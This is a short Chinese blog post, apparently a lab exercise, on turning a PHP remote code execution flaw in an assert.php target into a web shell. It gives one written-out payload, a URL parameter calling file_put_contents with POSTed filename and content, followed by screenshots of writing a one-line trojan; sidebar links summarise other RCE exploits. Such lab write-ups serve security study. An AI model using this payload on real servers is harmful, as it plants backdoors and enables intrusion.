远程命令执行漏洞利用之写shell

最新推荐文章于 2024-08-04 22:07:39 发布
最新推荐文章于 2024-08-04 22:07:39 发布
阅读量70 收藏
点赞数 2
文章标签: 学习 笔记 php 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67840381/article/details/140890102
版权

实验原理

利用远程命令执行漏洞可以执行写文件的代码,生成新的脚本文件。

靶机:

3de2004b540f417e863b4e50d9913c65.png

在URL后拼接"?a=var_dump(file_put_contents($_POST[1],$_POST[2]))",访问http://ip/os/assert.php?a=var_dump(file_put_contents($_POST[1],$_POST[2])),并发送post数据:1=info.php&2=,成功执行代码(Warning警告,但是并不影响)

a28a4d3e72c947eb8fa4697204b2bdf7.png

731aa3112a094cde8d09526147563ede.png

写入一句话木马

a5baec7389824456b1c343ec151103c1.png

0ce00c81a65f459da2443b0c10061fb2.png

e337e267025b497f99c8c90c50e00580.png

7626c035a5e04b518ef37f10a327555d.png

b14c6d4220ea42bd97e10665ee9b32f7.png

54d30044bae041789a28e39313e383ce.png

fdf7ba83687b4ffbb78186a056a38d2b.png

b7ae7e9b26474033b01982f9b7f905ed.png

 

 

 

白云间丶
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nginx文件路径处理远程命令执行漏洞
qq_36028750的博客
03-22 931
nginx文件路径处理远程命令执行漏洞 详细描述: nginx是多平台的HTTP服务器和邮件代理服务器。 nginx可以被配置为以CGI的方式支持PHP的运行,nginx在处理PHP脚本文件路径的解析时存在问题。如果网站允许上传文件,而且上传文件路径可得到,远程攻击者可以利用此漏洞上传包含恶意代码的文件并得到执行,实现以Web进程权限执行任意命令。 解决办法:修改nginx的配置文件。 ①首先修改 fastcgi.conf文件,改为如下内容: if ($request_filename ~* (.*)\.p
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
首先,我们需要理解什么是远程命令执行漏洞。RCE漏洞允许攻击者通过网络在目标系统上执行任意命令,通常是因为程序处理用户输入时存在不安全的代码实践。在Spring4Shell漏洞中,问题出在Spring MVC和Spring WebFlux...
22 - vulhub - Fastjson 1.2.47 远程命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-16 1098
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 因此在这里建议请及时更新至最新版本!
命令执行漏洞原理与利用
金色%夕阳的博客
04-30 1125
命令执行漏洞原理与利用 1 命令执行漏洞概述 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些执行系统命令的函数。 而应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞。 远程命令执行漏洞(RCE)是指可以在仅有远程访问权
命令执行漏洞利用技巧总结
st3pby的博客
05-19 2556
在红蓝对抗中,远程命令执行类漏洞往往是攻击方在正面路径中突破边界非常青睐的。常见的可以执行远程命令的漏洞的有各种JAVA反序列化漏洞、远程代码执行漏洞、远程命令执行漏洞(原生)、表达式执行漏洞、SQL注入漏洞等。远程命令执行类漏洞从漏洞探测到漏洞利用其实都非常讲究技巧。如果在进行漏洞探测阶段考虑的情况不全就会很容易遗漏漏洞,与漏洞擦肩而过;在漏洞利用阶段如果知识面不广(姿势不够多)的话可能就会陷入苦苦挣扎却无法获取权限的困境。目标操作系统类型、执行命令结果是否有回显以及是否能通外网。
命令执行漏洞——远程命令执行
weixin_54055099的博客
09-17 3847
命令执行漏洞之远程命令执行的基础操作
Samba 远程命令执行漏洞(CVE-2017-7494)
07-29 4205
Samba 远程命令执行漏洞(CVE-2017-7494)
RCE(远程命令执行)漏洞详解
sev1n的博客
04-02 2785
RCE(remote command/code execute,远程命令执行)漏洞 远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码。执行攻击者控制的代码的能力可用于各种目的,包括部署额外的恶意软件或窃取敏感数据。
Apache SSI 远程命令执行漏洞
m0_52701599的博客
02-19 827
Apache SSI 远程命令执行漏洞
命令执行漏洞之远程命令执行和系统命令执行
bwxzdjn的博客
03-27 5664
用实验案例的方式讲解远程命令执行和系统命令执行两大漏洞利用方法。通过实践更深入地了解命令执行漏洞的成因和危害,更好地掌握web安全相关方面的知识。
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
Adminxe的博客
07-02 5340
0x00 漏洞描述 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 看到这个beanshell,就会想起来一个洞,是泛微OA的beanshell 0x01 漏洞影响 用友 NC 0x02 FOFA “用友网络” 0x03 漏洞复现 漏洞位置 /servlet/~ic/bsh.servlet.BshServlet 将POC修改为: exec(“whoami”) 0x04 利用总..
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
远程缓冲区溢出漏洞利用程序
08-03
远程缓冲区溢出漏洞利用程序 在这篇文章中,我们将讨论如何编写远程缓冲区溢出漏洞利用程序。我们将假设有一个有漏洞的服务器程序(vulnerable.c),然后编写一个exploit来利用该漏洞,从而获得一个远程shell。 一...
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
python3编写ThinkPHP命令执行Getshell的方法
09-19
本文将详细介绍如何利用 Python3 来实现 ThinkPHP 框架中的远程命令执行漏洞,并最终获取 WebShell。 #### 二、ThinkPHP 命令执行漏洞简介 ThinkPHP 中存在一种较为常见的远程命令执行漏洞,该漏洞主要发生在对...
从根儿上学习spring 九 之run方法启动第四段(3)
最新发布
baidu_19338587的博客
08-04 530
一般情况下调用doGetBean方法获取的bean实例都是为了真实使用的,像我们上面举得A,B对象的例子获取的A,B对象当然都是为了真实使用的,但有种场景就只是为了做类型检查,比如有时候为了判断FactoryBean里的对象的类型就要先获取FactoryBean再通过getObject方法获取里面的真实对象来判断其类型,这时获取的FactoryBean实例可能就只是为了类型检查并不是为了真实使用。二:当bean是多例时,会有不同的创建bean的逻辑,下面我们按照代码顺序先分析单例的情况。
PySide6/PyQT学习笔记(很杂)
m0_56230886的博客
08-04 208
持续更新……
从根儿上学习spring 五 之run方法启动第二段
baidu_19338587的博客
08-04 441
讲完了PropertySources和PropertySource,我们再回头看图6的方法configurePropertySources方法似乎变得很简单没必要一行行分析了吧,这个方法就是向environment的sources属性里加入启动时的两个PropertySource,有不清楚的同学再结合我上面说的对着代码看两遍就清楚了,我就不再赘述了。Environment接口继承了PropertyResolver接口,PropertyResolver接口主要提供了获取配置属性的方法,如图3所示。
学习笔记--算法(双指针)5
weixin_71085457的博客
08-04 410
学习自用!!
深信服edr代码审计:远程命令执行漏洞分析(RCE)
本文主要讨论了深信服edr终端检测响应平台在3.2.21之前的版本中存在的一个严重安全问题,即远程命令执行漏洞。这种类型的漏洞通常允许攻击者通过注入恶意代码来执行任意系统命令,对系统的安全性构成重大威胁。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值